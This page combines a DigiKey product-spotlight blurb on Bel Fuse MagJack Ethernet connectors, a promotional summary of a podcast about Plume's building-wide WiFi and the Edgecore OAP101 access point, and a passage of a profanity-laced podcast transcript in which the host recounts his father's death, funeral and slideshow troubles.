POPULARITY
This week's EYE ON NPI is as ethereal as it is magical: it's Bel Fuse's 1xN port MagJack and specialty ICMs (https://www.digikey.com/en/product-highlight/b/bel-fuse/1xn-port-magjack-and-specialty-icms). These are specially made Ethernet and Ethernet-USB combo jacks that have magnetic transformers inside to make integration with your Ethernet PHY (https://en.wikipedia.org/wiki/Ethernet_physical_layer) in order to communicate on the network. MagJacks make designs smaller, and less noisy - they're a great way to simplify your next Ethernet design and get it to market faster! Wireless this, 5G that - what we sometimes need are WIRES! Wired networking is much reliable than wireless, and can go far distances with no loss of signal strength. Particularly as you can also put power over the same wires for nodes that need no other cabling, Ethernet is a reliable networking standard - don't discount it just because of its age! One nice benefit of it is you don't have to do SSID/password setup, it's truly plug and play. Three things are required to add Ethernet. First is a microcontroller or microcomputer that has built in Ethernet Medium Access Control (https://en.wikipedia.org/wiki/Medium_access_control), the low level packet forming technology. Some chips have this built in, such as the ESP32 (https://www.digikey.com/short/dz5pv22m) - or you can use a companion chip like the WIZ5xxx series (https://www.digikey.com/en/supplier-centers/wiznet) that can be controlled over SPI. Then, to get onto a network, you'll want the ubiquitous mechanical RJ-45 connector (https://www.digikey.com/short/t28834zr) that will lead to Cat-5 or Cat-6 cable (https://www.digikey.com/short/pnjh3t8d). In between, the signal levels need to be isolated and converted to the +-2.5V differential signal. To do that we need what is colloquially referred to as the 'magnetics': a cluster of transformers and chokes that will make the signal differential, isolate the PHY from the outside world and also reduce the risk of outside spikes and shocks. Both the Wiznet and ESP32 datasheets, for example, have example wiring to help you identify the right configuration. Note that not all chips have the same magnetics impedances / configurations: it depends on the output signal and impedance. Second, this is separate than PoE magnetics (https://www.adafruit.com/product/3847) which are separate from the data transfer. If you don't care about optimizing board size and complexity, you can always use external magnetics with a plain jack. Bel has a full selection of dozens of magnetics for any configuration you may need (https://www.belfuse.com/product-detail/icm-s-discrete-lan-magnetics). For example the Seeed Ethernet shield (https://www.digikey.com/short/70cvntbm) uses this technique because the PCBA is so big they have space to spare. However, when you want to keep your board compact, you can upgrade your design to use one of Bel Fuse's 1xN port MagJacks. (https://www.digikey.com/en/product-highlight/b/bel-fuse/1xn-port-magjack-and-specialty-icms) MagJacks provide two big benefits (https://www.digikey.com/en/product-highlight/b/bel-fuse/1xn-port-magjack-and-specialty-icms): one they're smaller than separate magnetics/jacks and second, the magnetics get enclosed in the metal shell of the jack which provides some EMI shielding. For example, we used a combo-jack on the Ethernet Featherwing (https://www.digikey.com/short/9w49r80j) to keep the design single-sided. Which is why we were excited to see the Bel Fuse MagJacks pop up on https://www.digikey.com/new - they're a trusted component we've used before. For this week's EYE ON NPI, DigiKey is highlighting a selection of the new Bel Fuse MagJacks, with dozens of options available (https://www.digikey.com/en/product-highlight/b/bel-fuse/1xn-port-magjack-and-specialty-icms). There's classic horizontal ones with LEDs (https://www.digikey.com/en/products/detail/bel-fuse-inc/P01-0002-01/25588398). Vertical ones! (https://www.digikey.com/en/products/detail/bel-fuse-inc/P01-1AF2-01/25588382) Countersunken for low clearances (https://www.digikey.com/short/5b9mb454) As well as some nifty combo-units that contain both USB type A and Ethernet. (https://www.digikey.com/en/products/detail/bel-fuse-inc/P01-3CG3-01/25588395) Just make sure that the internal magnetics match your chipset's needs before selecting it for integration. DigiKey is in the process of stocking all the varieties, but if you want to get started, the P01-1AA2-01 (https://www.digikey.com/short/pw02p9m9) is in stock now for immediate delivery. Order today and you can get this part in your hands by tomorrow morning to help optimize your next Ethernet design!
Edgecore OAP10 is the first purpose-built access point designed to bring Plume's extensive software benefits to even more spaces, "Plume is a Wi-Fi software services company. We focus on delivering our services to the end home through our CSP channel. We work with about 400 plus internet service provider CSPs globally" “As areas become increasingly denser and device-rich, especially in apartment buildings, signal interference can kneecap WiFi performance. Tony Liebel, Product Suite Manager at Plume, discusses how Plume's cloud-based WiFi platform with active client steering and bandwidth selection outperforms traditional network solutions that fight blindly for bandwidth by approaching the building holistically.” In this episode, Doug and Plume's Principal Product Principal manager Tony Liebel talk about the benefits of a whole-of-building WiFi approach for multi-resident buildings, Plume's new outdoor access point and how the company works with multiple partner types to better the experience for everyone. Tony is a veteran of the residential technology space and shares his expertise on how residents, property owners and CSPs can provide greater value and receive the best return out of investments in their WiFi amenities. Plume takes its proactive algorithm for managing a home's worth of devices and applies it across a whole building, ensuring that each unit does not interfere with the other, equipping residents with their own SSID and providing property managers with features such as a dedicated IoT network for smart locks, water-leak detectors, and many other connected devices. Doug and Tony discuss the new Edgecore OAP101, the first purpose-built access point designed to bring Plume's extensive software benefits to even more spaces. It opens up a wide set of opportunities for residences, multi-family properties, and small businesses to cover their property with a seamless WiFi experience. “Plume is a Wi-Fi software services company. We focus on delivering our services to the end home through our CSP channel. We work with about 400 plus internet service provider CSPs globally. And we have several product lines that fit all of the needs of the CSP from something called HomePass, which is what is delivered to the end resident, WorkPass, which is for small and medium-sized businesses, and then my part of the business that I run called Uprise, which is all things multi-resident and multi-family in the MDU world.” Edgecore OAP10 The OAP101 is an enterprise-grade, dual-band Wi-Fi 6 outdoor access point, designed to withstand harsh weather conditions in outdoor and industrial environments with IP68-rated, rust-resistant housing. The OAP101 features 2×2:2 uplink and downlink MU-MIMO that can each transmit data to multiple clients simultaneously and together have a combined data rate of up to almost 3Gbps. The OAP101's integration with Bluetooth Low Energy (BLE) enables value-added applications such as iBeacon and Matter applications. The OAP101 can be operated in a standalone mode or managed by Edgecore ecCLOUD, ecCLOUD-VPC, or EWS/VEWS Series controllers. Visit www.plume.com Edgecore OAP10 https://youtu.be/XvS3U1BTUjI
I don't normally do this, but content warning, this episode talks at length about death and funerals and, while I continue to approach everything with an inappropriate degree of levity, if that's something you're not game to listen to right now, go ahead and skip the first hour of this one. Recommend me your favorite show or video game at podcast@searls.co and I will either play/watch it or lie and say I did. Thanks! Now: links and transcript: Kirkland Signature, Organic Non-Dairy Oat Beverage Die with Zero book The "Prefer tabs when opening documents" setting Aaron's puns, ranked Amazon hoped more people would quit BoldVoice Accent Oracle Cab drivers get Alzheimer's less Video Games Can't Afford to Look This Good LG announces Bachelor's Only TV Can the rich world escape its baby crisis? Why aren't we talking about the real reason male college enrollment is dropping? The Diplomat The Penguin It's in the Game Madden documentary Like a Dragon / Yakuza 7 Indiana Jones and the Great Circle Transcript: [00:00:29] It is our first new year together in this relationship. [00:00:36] Breaking Change survived season one. [00:00:39] We are now in season two. [00:00:43] I don't know what, you know, how seasons should translate to a show about nothing. [00:00:51] I like to talk about how, you know, in different stages of life, we go through different seasons, right? [00:00:58] You know, like maybe, you know, after, you know, the seasonal life when maybe you get married or you have a kid, your first kid and all the changes that kind of go with that. [00:01:08] And if you play multiplayer competitive games, you might go through different seasons. [00:01:15] You know, like if you play Diablo four or Call of Duty, you might be in a particular eight week or 12 week season. [00:01:24] Now, as you grind your battle pass, that's similar in in scale and scope to having a child or having some big life event, because it turns out none of this fucking matters. [00:01:35] Hello, welcome. [00:01:36] This is a this is your kind and friendly host, Justin Searles, son of Fred Searles, son of Fred Searles himself, son of a Fred Searles. [00:01:48] That's yeah, there were there were, I think, three Fred's before me and then my dad was like combo breaker and he named me Justin. [00:02:02] Uh, thank you for subscribing to the advertisement free version of the podcast. [00:02:08] Uh, if you, if you think that there should be an advertisement version of the podcast, feel free to write in a podcast at Searles.co and then pay me money to read about your shit. [00:02:20] And I will do that. [00:02:21] Uh, and, and, you know, I'm happy to have all the conflicts of interest in the world because, uh, if your product sucks and I use it, I can't help myself. [00:02:32] I'm just, I'm just going to say it's bad. [00:02:34] So, uh, that's a real, you know, I, I, if you can't tell, I also run the ad sales department of this journalistic outfit and, uh, that might have something to do with the total lack of, uh, corporate funding. [00:02:48] Well, anyway, this is version 28 of the program. [00:02:54] This, this, this episode's breaking change titled, do you regret it yet? [00:02:59] And that'll make sense, uh, momentarily. [00:03:03] Uh, so, um, it's a big one in a sense, you know, it's something that, uh, there's very little in life that I'm not comfortable talking about. [00:03:14] And that's because, you know, well, I'll just dive right in. [00:03:20] So, so I read it, uh, I read an article, uh, uh, some number of years ago that explained that part of the reason why foot fetishes are so common in men is like part of the brain that identifies feet. [00:03:38] And part of the brain that is like erogenous in its, you know, there's different parts of the brain. [00:03:46] They do different things, but if you got to pick which neuron cluster you lived in as a part of the brain, erogenous zone, that would be sweet. [00:03:53] That'd be a lot more fun than the, um, whatever the, the part of the brain is that gets scared easily, which, uh, because I get stressed and anxious, [00:04:04] even just talking into a microphone with zero stakes on a recording that I could stop. [00:04:08] That makes me no money. [00:04:10] I'm too nervous to remember the fear part of the amygdala. [00:04:13] There it is. [00:04:14] You see, and if it just, and, and that gets back to my point in my particular fucked up brain soup, [00:04:22] the, uh, the, uh, the part of my brain that talks out my mouth hole is right next to the part of my brain that critically reasons through things. [00:04:37] So for me, it is very difficult to process something without talking it, talking it through. [00:04:47] And the idea that something is taboo has always been really uncomfortable for me. [00:04:52] And you can just sort of see the pained look on my face as I try to hold it in like a, like a burp or something. [00:04:57] Like I, I, I got to let it out somehow. [00:05:00] And so I'm, I, you know, I'm glad, I'm glad I get to be here with you. [00:05:05] I hope you find it kind of entertaining. [00:05:06] Unfortunately, the thing to talk about first thing, as I get into the section of this to-do list, that is this podcast titled life is that the big thing that happened since the last major breaking change, uh, uh, back in version 26, which is, I, I, I understand two numbers away from 28. [00:05:30] Uh, the big thing that changed, uh, is, uh, my father, Fred, he of a, a long and proud line of Fred's, uh, he passed away, uh, uh, uh, December 15th. [00:05:45] So just, just shortly after, uh, the previous, the previous version aired and, uh, pretty much every it's January 4th today and we're still working through it. [00:05:59] Um, he had a heart attack. [00:06:02] I think that's fair to say at this point, there's no, you know, no way to be a thousand percent sure, but all the signs suggest that's what it was. [00:06:11] And, uh, you know, without getting into, uh, the, the details, my side of the story is like, I was at Epcot with my brother, Jeremy. [00:06:26] So at least we were together. [00:06:28] Um, Jeremy gets the call and, uh, you know, we were, we were in that little tequila bar, uh, hanging out with a friend of ours who works there. [00:06:40] And, uh, the tequila bar inside of the Mexican pavilion pyramid. [00:06:44] And, uh, he had just brought us out the three kind of specialty cocktails that they got going on right now. [00:06:53] Uh, which is, uh, you know, wasn't, we are in a great time. [00:06:57] It was a lot of fun. [00:06:58] And, uh, Jeremy gets the call. [00:07:00] We process a little bit. [00:07:02] We realized like, we got to get home. [00:07:04] We got to figure this shit out. [00:07:06] You know, he's, he's a, he was a former emergency responder. [00:07:09] So he's really good at, uh, at thinking through the logistical things that you have to do with a relatively cool head. [00:07:16] It, you know, he comes across as like, you know, not drill sergeanty, but somebody who's like, you know, part of being calm and collected in an urgent situation is you have to be very direct. [00:07:28] And boom, boom, boom, boom. [00:07:30] So that was as soon as he knew what was happening. [00:07:35] That's the mode he flipped on. [00:07:37] And the mode that I flipped on was intense, uh, metabolization is the best word I can think of it. [00:07:44] Cause like you have like, like, like, like the saves take four shots of liquor, right? [00:07:48] You will metabolize that at whatever speed you do, and it'll hit you really hard and maybe you'll black out and maybe you'll, uh, you're a slower burn. [00:07:56] But for me, I feel, I feel things, whether they're chemical toxicology report showing up things or emotions, I tend to feel them extremely intensely and, and, and, and, and in a relatively brief burst, you know, uh, if you ever lit in a strip of magnesium on fire, which for some reason I did several times. [00:08:19] I was in, in, in different science lab classes as a kid, it brights, it burns real bright and real hot, but not for very long. [00:08:27] So while, while Jeremy was in his, you know, we got to figure out what to do mode. [00:08:33] Uh, we got to get out of here. [00:08:35] Uh, we gotta, you gotta, you know, we gotta book the next flight to Michigan to take care of this shit. [00:08:43] I was in, I'm going to, I'm going to just take a little, I'm going to pop a little deep squat here in Epcot, uh, right outside this bar. [00:08:56] And I'm going to just allow my vision to get blurry, which it did. [00:09:04] Um, my heart to race, my stomach to turn. [00:09:08] And I just needed that, you know, you lose track of time when something big and, and, and, and, and earth shaken happens. [00:09:20] I [00:09:22] snapped out of it is, you know, it's, it's crude way. [00:09:31] Words don't, words that you use for everyday things end up getting used for big life-changing things. [00:09:40] And it makes it feel smaller. [00:09:43] So even though I'm verbally processing every time I tell the story or think through it and, and talk it out. [00:09:53] I, I, I, I kind of came to my normal Justin senses pretty quickly, uh, where normal Justin senses means, you know, back in the bar, you know, everyone's, you know, who'd heard was upset and immediately like they're in their own kind of sense of shock, even not knowing my dad. [00:10:14] And I, I was, you know, uh, comforting them immediately and, you know, just asking our host, Hey, you know, because as a, as a staff member, he, he's able to get us out of the park a little bit more expeditiously, uh, than having to go all the way out and do this big, you know, what would have felt like a 15 minute walk of shame out of a theme park. [00:10:39] And, uh, yeah, anyway, so he got us out of there, we got home, booked flight, got, went up to Michigan the next day, uh, pretty much immediately. [00:10:50] And, and, and, and, and, and kudos to my brother for, for having that serious first response. [00:10:56] Cause like my first response after asking for, Hey, get us out of here was to see those three specialty cocktails on the table and be like, well, that, that would be a waste and B I could probably use a drink. [00:11:08] And so I, you know, one of them was a sake and, uh, mezcal infusion. [00:11:13] And I was like, well, they'd already poured it. [00:11:16] So I just threw that back on, on my way out the door. [00:11:18] That was probably a good move. [00:11:21] Uh, so we got up to Michigan, right? [00:11:25] And I don't want to tell anyone else's story about how, how they work through stuff and families. [00:11:31] Everyone processes things differently. [00:11:34] Uh, uh, so I'll skip all that shit. [00:11:36] I'll just say that like pretty quickly, the service planning, like that takes over, you know, the, uh, this is the first time I've had an immediate family member pass, but pretty quickly you're like, all right, well, there is this kind of, you know, process. [00:11:53] It's like not dissimilar from wedding planning, but instead of having six months, a year, or if you're an elder millennial, like eight years to plan, you have, uh, a few days. [00:12:07] And fortunately, uh, uh, dad had just by coincidence of, of, of another, uh, person we know passing had found a funeral home that he really liked. [00:12:18] And he, he said he wanted to do that one. [00:12:20] So that, that was off the table. [00:12:21] That was, that worked out. [00:12:23] But, uh, then, you know, even, and that was helpful. [00:12:28] That was really helpful to sit down and, and, and, you know, of course you go to the funeral home, you talk to the funeral home director and super sympathetic there. [00:12:35] It takes a certain kind, right? [00:12:38] A person, you know, you gotta have the strategically placed tissue boxes all over the place and then know when to stop talking and when to hand it and when to back away. [00:12:46] And, you know, dude is an absolute champ, but he's also done this before and he knows the questions to ask. [00:12:55] And it's not to like boil it down into a questionnaire, but it, it's a questionnaire. [00:13:00] It's like, Hey, what do you want? [00:13:01] How do you got to do this? [00:13:02] You know, you're being bang, boom. [00:13:04] What? [00:13:04] And fortunately, uh, collectively we came to the table with a lot of answers to a lot of those stock questions at the ready. [00:13:15] Um, but the thing that stood out to me was, you know, there's going to be a service we're going to have to write an obituary. [00:13:22] They gave us a start and, um, a start is actually the perfect thing to give me when it, when it comes to writing, you know, if you give me a blank page, it could take me all week. [00:13:32] But if you give me something I don't like and like me not writing in a hurry would result in the thing I don't like going out, then all of a sudden I get the motivation to go and write some shit. [00:13:46] So we, we, we, we, we worked together and we cleaned up the eulogy or the, excuse me, the obituary, all these terms you only use sparingly. [00:13:55] Occasionally, uh, got the obituary out, had a tremendous response, maybe from some of you because it was up on the website. [00:14:05] Had a tremendous response from people. [00:14:07] Everyone was shocked. [00:14:08] You know, no one expected that, uh, dad had a tremendously large social network being a dentist for 45 plus years in a community of people who loved him. [00:14:20] And he was genuinely, you know, an incredibly kind and friendly guy everywhere he went. [00:14:26] Uh, so, so that was good. [00:14:29] And you re and, and it was the obituary that made me realize like, well, I, you know, I knew this intellectually, but be like, oh yeah, like next few days here are for them. [00:14:37] It's for everybody else to understand process grief. [00:14:42] And so as soon as the obituary out, I was like, all right, next eulogy time. [00:14:48] So I, uh, I approached it as soon as I knew it's a, when I know something's for me, I let it be for me. [00:14:58] I'm not, I've, I accept myself. [00:15:00] I love myself and take care of myself as best I can. [00:15:03] I don't, I'm not a martyr, right? [00:15:06] Like I don't push down my needs and interests for the sake of other people. [00:15:12] To the point of other people's viewing it as selfish sometimes. [00:15:15] And increasingly over the years, I'm viewing it as like, maybe you, maybe it's the children who are wrong. [00:15:21] Maybe this is just the way to be, because it turns out that when you take good care of yourself, you can show up for other people. [00:15:26] Well, right. [00:15:26] So anyway, I, I, as soon as I knew that like the point of the service wasn't for me, the point of the service was, uh, the other people in the room who, who, some of whom drove hours and stayed overnight in hotels to come be there. [00:15:42] It was, it was to give them something. [00:15:46] So as soon as that bit flipped in my brain, it became very easy to write a eulogy because I, I approached it like work. [00:15:56] I approached it like a conference talk or yeah, like it, I didn't actually open keynote, but I thought about it because that's how, that's how I tend to storyboard and work out conference talks. [00:16:09] And I, I thought about like, well, maybe I just do that and I just don't show the slides, you know, because I think it would be possibly inappropriate to, to have a PowerPoint presentation at your, I, at a funeral. [00:16:23] I don't know. [00:16:24] I guess I had to make one anyway. [00:16:26] We'll talk about that. [00:16:29] So anyway, writing, the eulogy took over. [00:16:31] It went smoothly. [00:16:33] It, I liked how it turned out. [00:16:35] If you subscribe to the newsletter, you'll get a copy of it. [00:16:38] So, so justin.searles.co slash newsletter. [00:16:41] It's called Searles of Wisdom, which of course, you know, me making that sound kitschy right now in this rather grave moment might sound inappropriate to, to, to shill, but you will get a copy of the eulogy. [00:16:53] I'm happy with it, how it turned out. [00:16:56] I, uh, as soon as I wrote it then, of course, and this is what I'm trying to illustrate is like everything just became task A. [00:17:03] Like, okay, task A is complete, task B, no real time in there for processing and thinking through things through. [00:17:11] Uh, so the eulogy took over, wrote it, and as soon as I'd written it, I was now task C, I gotta deliver it, you know. [00:17:21] I don't typically read a script when I speak, uh, but I had to write it all out as if it was being spoken. [00:17:32] And I had to even practice and rehearse it as if I was reading it because I knew that in an emotionally, you know, the best way that people seem to talk about this is like, it's, your emotions are close to the surface as if like any little tiny thing could just break the surface tension and, and, and spill over. [00:17:51] Right. [00:17:52] I knew that out of my control, I might, I might tear up. [00:17:56] I might cry. [00:17:57] I might need a minute. [00:18:01] While delivering this. [00:18:02] And so I, uh, I, I practiced it to be read, but I knew like, man, there's just a, there's a, I call it a 5%, 10% chance that I just have a fucking breakdown and I can't get through this thing. [00:18:18] And the anxiety in the day and a half leading up to the service worrying that I would fail as a public speaker outside the context of, you know, sure. [00:18:32] Everyone would give you a break if your dad just died. [00:18:35] Right. [00:18:35] But this is like the last thing I'm doing for him, you know, in a, in a publicly meaningful way. [00:18:40] And it's also a skill that I've spent a lot of time working on. [00:18:45] And so I wouldn't for me to fail at that by, by breaking or by even, even just failing to deliver it successfully and in a, in an impactful way would have been hard for me. [00:19:05] And it would have been something I probably would be ruminating on here. [00:19:08] We are a couple of weeks later. [00:19:10] And as a result, what happened is the same thing that happens before I give a conference talk in front of a bunch of people at a conference or whatever. [00:19:18] It's the, the, the, the, uh, stress hormone gets released, the adrenaline and the cortisol starts coming out. [00:19:26] And so the morning of the funeral, everyone else is kind of approaching it their own way. [00:19:31] And I'm like, it's game time, you know, like I, I'm dialed in my, you know, all of my instincts are about just getting through that five to seven minute speech. [00:19:47] And no emotional response before then. [00:19:50] And afterwards, to be honest, the biggest emotional response afterwards was the relief of successfully. [00:19:57] And I did successfully deliver it. [00:19:59] And, uh, and then as soon as task C of delivering it is done, then task D starts of now it's the end of a funeral service. [00:20:08] And you've got a receiving line of all these guests coming up and they, you know, they're, they're approaching the open casket and they're, they're coming to, you know, hug you, talk to you. [00:20:17] See how you are. [00:20:18] And there's a performative aspect to that, right? [00:20:22] Like you gotta be like, all right, who's ready for lunch? [00:20:24] That would be inappropriate. [00:20:25] Right. [00:20:26] But the, you know, also talking about how, like, oh, I'm actually mostly focused on how I did a good job. [00:20:32] Giving this speech would separately be maybe, you know, off color, but these are the things that go through our brains in the, in these high impact moments. [00:20:43] When you just have to, when, when, whenever a situation dictates that your behavior be misaligned or the statements about oneself be at all discordant with what's really going on inside you in that literal moment. [00:21:08] And so, so I did my best, uh, of course, to make it about other people and see how they're doing and answer their questions in as, uh, productive a way as possible. [00:21:20] Right. [00:21:20] Give them answers about myself that gave them the things that they needed was my primary response all through. [00:21:29] And then, and then through that, and then task E, the wake. [00:21:32] Right. [00:21:33] And, and, uh, you do, you, you do that. [00:21:35] And then suddenly, uh, well, now you have task F after, after all that stuff of like, okay, well, we've got all this leftover food we got to take home. [00:21:42] So it's like load up the car and, and, and, and help everyone out and see everyone on their way safely. [00:21:48] And then, you know, you're exhausted and you want to just go back and, and, you know, get out of this fucking suit that barely fits. [00:21:58] Nope. [00:21:59] Task G is you got to go turn around, drive 20 minutes in the opposite direction to go back to the funeral home, to pick up all of these flowers. [00:22:05] Cause you, you tell people not to send flowers. [00:22:07] Uh, you, you say, you know, in dad's case, donate to the humane society, but people send flowers. [00:22:14] And then, you know, what do you fucking do with them? [00:22:16] Right. [00:22:17] It's like, well, here's look, if you or someone you're affiliated with sent flowers to this particular funeral, I'm deeply grateful. [00:22:25] And I had a moving moment, actually looking at all the flowers of friends of mine, people who never met dad. [00:22:31] Most of the time, a couple of our neighbors, right. [00:22:35] Who we don't really know well, but they're just really lovely people. [00:22:38] They, they did a bouquet and it was really nice. [00:22:40] You know, flowers are beautiful, but. [00:22:49] Like a cigarette can be really, really nice, but a carton can be a lot. [00:22:53] Uh, you know, a cocktail can be really nice, but drinking a whole fifth is problematic. [00:23:00] When you have so many bouquets that you can't fit them into your vehicle and also the people in the vehicle. [00:23:06] It's all it's, it, it just, it, it becomes a work. [00:23:10] Right. [00:23:11] And so that's what, you know, that's one of the ways in which having this service like this become sort of, you know, like less about the immediate family and more about the surrounding, you know, network of people that somebody knows. [00:23:24] And maybe this is all common sense and, and I should have been more conscientious of this going into the experience, but looking back on it, uh, I was just sort of like, all right, well, here's next task is figure out how to cram all these flowers. [00:23:39] And then you get home and it's like, where'd all these flowers go? [00:23:43] And so you just kind of scatter them throughout the house. [00:23:48] Uh, but they're all, you know, like they're not invasives or they're not like going to survive the long winter. [00:23:53] Like they're, they're now all on their own separate week to two week timer of themselves dying and needing to be dealt with, which is like, you know, a, let's just say an echo or a reverberation of like kind of what you're thinking about. [00:24:07] So maybe, okay, look, I don't want to spend this whole fucking podcast talking about a funeral. [00:24:15] I realize it's like maybe a bit of a downer, but you know, there's other stuff going on to like, I skipped a whole fucking half day activity. [00:24:25] Actually is wedge a task in there between B and C if you're for anyone playing the home game and keeping track of this, not that it's that complicated, uh, you got to come up with a slideshow, right? [00:24:39] So you've got the visitation before the service and we also had it the night before for anyone who couldn't make it or, you know, maybe acquaintances and whatnot, who didn't feel like going to the whole service, whatever it is. [00:24:57] You got to come up with a slideshow, which is theoretically easy these days because there's so many goddamn pictures of all of us. [00:25:04] It's theoretically easy because you have tools like, uh, shared iCloud photo libraries, uh, and shared albums, which, you know, as soon as somebody suggested a shared album, I went into my like pre canned speech. [00:25:20] And I think of, well, actually shared albums predate, you know, modern ways of sharing photos in the photos app. [00:25:25] And so whenever you put anything in a shared album, Apple compresses it pretty badly. [00:25:30] It, it downscales the resolution. [00:25:32] It also, you know, adjusts downward, the quality of the image. [00:25:39] And I got halfway through that spiel and being like, you know, this is going to go up on a 10 ADP TV in the back of a room. [00:25:45] Like it's fine. [00:25:46] That's not the issue. [00:25:47] But then the next issue is, you know, everyone goes in the people and pets and photo library, sees all the pictures of dad that aren't bad. [00:25:56] And we all dump them into the same shared library, shared photo album, which is like, like, that's no one's fault, but mine. [00:26:02] I told people just do that and I'll clear them out. [00:26:04] But then you wind up with, and it turns out, this is how that stupid fucking system works. [00:26:09] The shared photo album will treat all of those duplicates as distinct. [00:26:14] And there's, even though there's duplicate deduping now in the photos app, it does not apply to shared library, shared photo albums. [00:26:21] And on top of that, if somebody adds something to a shared photo album, they can remove it. [00:26:27] But for somebody else, like, like, let's say I added a photo of dad that Becky didn't want in there. [00:26:33] Well, Becky can't go in and remove it. [00:26:35] Only the organizer can remove it or the person who posted it. [00:26:39] So then I had to be the person going through and, like, servicing any requests people had for photos to, like, ban from the slideshow. [00:26:46] Because for whatever reason, you know, it's a sensitive time. [00:26:49] And then after it was all done, you realize the slideshow tools don't work correctly. [00:26:56] Like, just the play button and all the different options in the Mac, like, just don't work correctly in a shared album. [00:27:01] Because, of course, they don't. [00:27:02] So then you've got to copy them all. [00:27:07] You thought I was talking about feelings, but it all comes back. [00:27:11] All comes back to Apple shit. [00:27:13] So you've got to copy them all into your photo library, whoever is going to be running the slideshow. [00:27:17] Create a new slideshow project from there. [00:27:20] Dump them all in there. [00:27:22] And then realize there's no, once you've dumped shit into a slideshow project, there is no way to reorder them. [00:27:27] Short of manually drag dropping extremely slowly in a left-right horizontal scroll dingus. [00:27:34] And you've got 500 pictures or something, just fucking forget about it. [00:27:37] And on top of that, I had all these dupes. [00:27:40] Like, I had manually de-duped as best as I could before. [00:27:43] But first question I get half an hour into the visitation is like, yeah, it just seems weird. [00:27:48] Because, like, there's this one picture of me that's going to come up, like, four times. [00:27:52] I was like, I'm sorry, bud. [00:27:54] I said, oh, it's randomized or whatever, you know. [00:28:01] So after you get all of those into a photo slideshow project, and successfully, I installed amphetamine, which will keep your screen awake. [00:28:11] And you plug that into HDMI, and you know how to put a fucking Mac on a TV. [00:28:15] I don't need to tell you that. [00:28:16] After all of it was done and I got home, the two days later I realized, oh, yeah, shit. [00:28:24] Because now my photo library is full, all of the most recent photos are just shit that was copied, that was already initially in my photo library anyway. [00:28:32] And none of them are showing up in the little dupes thing, of course, because it needs days to analyze on Wi-Fi. [00:28:39] So I went to the recent imports or recently saved tab, and then I had to manually go through and delete, like, 1,400 pictures of my dad. [00:28:50] And then hope that, like, I wasn't deleting one that wasn't a dupe. [00:28:55] So I had to go through and, like, manually tease these out. [00:28:59] It took me a fucking hour and a half. [00:29:02] And, yeah, so then I deleted all those to kind of dedupe it, because I was confident I had copies of all those pictures already somewhere else in the library. [00:29:11] That could have been smoother, is the short version of this story. [00:29:16] And, of course, there's no goddamn good software that does this. [00:29:20] There are two people who have made apps that simply shuffle photos in a slideshow. [00:29:26] And they're bad apps. [00:29:27] So they look old. [00:29:28] It's like they basically had to reinvent slideshow stuff, including the software and the shuffling and the crossfades and the Ken Burns effect and the music and all the stuff that the Apple product does. [00:29:38] They had to reinvent all that just to have a shuffle button, which is what you probably want, especially if you've got a mix of scanned photos and, you know, contemporaneous photos. [00:29:50] Because there's no way you're going to make the timeline actually contiguous. [00:29:54] So instead, like, well, here's, like, a bunch of photos between, like, 2003 and 2017, because that's the digital photography era. [00:30:05] And then in 2018, when we scanned all of our photo albums, suddenly it's just all of the photo albums in random order. [00:30:12] And then you have 2019 to 2024. [00:30:15] Like, it's not a cohesive experience. [00:30:20] Now, I would say, well, you know, it's a visitation. [00:30:23] People are coming and going. [00:30:24] They go in, they visit the casket, and they spend time chatting. [00:30:28] But, like, they don't, though. [00:30:30] All the chairs are pointing at this TV, and people just sat there for more than an hour. [00:30:36] They'd watch multiple. [00:30:37] Like, I thought that having a 45-minute long slideshow, that pacing would be okay. [00:30:43] People watched it two or three times while they chatted, you know, just the state of, the lack of kinetic energy throughout the entire experience of somebody passing. [00:30:54] You know, the phrase sit Shiva from Judaism. [00:30:58] Like, I am somebody who is relatively uncomfortable just sitting around, around other people. [00:31:06] I'm happy to sit around by myself. [00:31:08] I'm doing it right now. [00:31:09] I'm actually pretty good at it. [00:31:10] Ask anybody. [00:31:11] But to not have an activity with other people, and also not to have, like, interesting conversation to have with other people, [00:31:20] to just have to be around and with other people, is really goddamn hard. [00:31:25] And I suspect I'm not the only one who feels that way. [00:31:28] Hence, everyone just staring at the slideshow and making a comment here and there. [00:31:32] So, a couple things did jump out at me about that service and about the visitation, though, that were interesting. [00:31:40] One was, Dad had mentored a couple of younger dentists in his last couple years practicing. [00:31:48] People who had intended to take over the practice. [00:31:51] That's his own long story. [00:31:52] But they were, my age or younger, probably younger, definitely younger, come to think of it. [00:31:59] Splendid people. [00:32:00] Like, super upbeat, super duper energetic, just, like, fun. [00:32:05] They forced my dad to do stuff like go fishing and get out and do things that he normally wouldn't do. [00:32:13] And they blew me away by just saying, like, you know, dad was 72. [00:32:18] He was like, this guy, most dentists, when they get older, the hands get shaky. [00:32:25] Their craft gets sloppy. [00:32:28] But your dad was, he, he, I think he said, he set the standard. [00:32:33] He was just a beast. [00:32:34] He was, and I was like, what do you mean? [00:32:36] Like, actually, I've never really talked to anyone about his craft, right? [00:32:41] Because he didn't want to talk about it. [00:32:44] He was like, his prep work and, and, and how he prepped for each procedure was meticulous and perfect every single time. [00:32:53] And his technique while doing things was, was like, like phenomenal. [00:33:00] And they went into a handful of specifics for me. [00:33:02] And that was really special to me because I, like, I, I know that about myself that I'm chasing this asymptotic goal of perfection, but I didn't have evidence that my dad was as well outside of just stuff around the house. [00:33:16] And you can say that, well, that's perfectionism and that's OCD. [00:33:19] And we both have like, you know, traits of that too. [00:33:20] But the, that was really interesting because everyone had only ever experienced my dad as a patient or somebody who's like really, really gregarious and friendly and good at comforting patients. [00:33:33] But yeah, their stories were really, really encouraging. [00:33:39] And that was, that was one where it's like, I was glad to be able to walk away from that series of experiences and learn new stuff about my dad, uh, new stuff that rounded out the story of him in my mind. [00:33:54] Uh, so I'm really thankful to those guys, uh, because they were able to dive in and baby bird for me, explain like I'm five, like the ways in which he was a great dentist, which is just a thing that like, you know, everyone. [00:34:08] How do you rate your dentist, right? [00:34:10] Well, he's good at comforting me. [00:34:12] He's good at explaining things. [00:34:13] He doesn't upsell me a lot. [00:34:15] You know, I'm not afraid when I'm in the chair with him. [00:34:17] And then afterwards things seem to go pretty well, but like, really like the, the work is a black box. [00:34:22] You can't see what's going on in your fucking mouth. [00:34:24] You're, you're conscious. [00:34:25] You know how you feel before and how you feel after, but it's, uh, that was really cool. [00:34:31] Uh, the other, uh, another dentist that worked for him earlier in, in, in, uh, his career, uh, she, she had previously lost her dad and she said, you know, she said something that felt at the time, extremely true. [00:34:47] That a funeral is like having to host the worst party ever. [00:34:51] Uh, so that just to put a cap on it, that's, uh, accurate. [00:35:00] It felt like a party because I got to see a whole lot of people, friends from college, you know, Mark Van Holstein, the 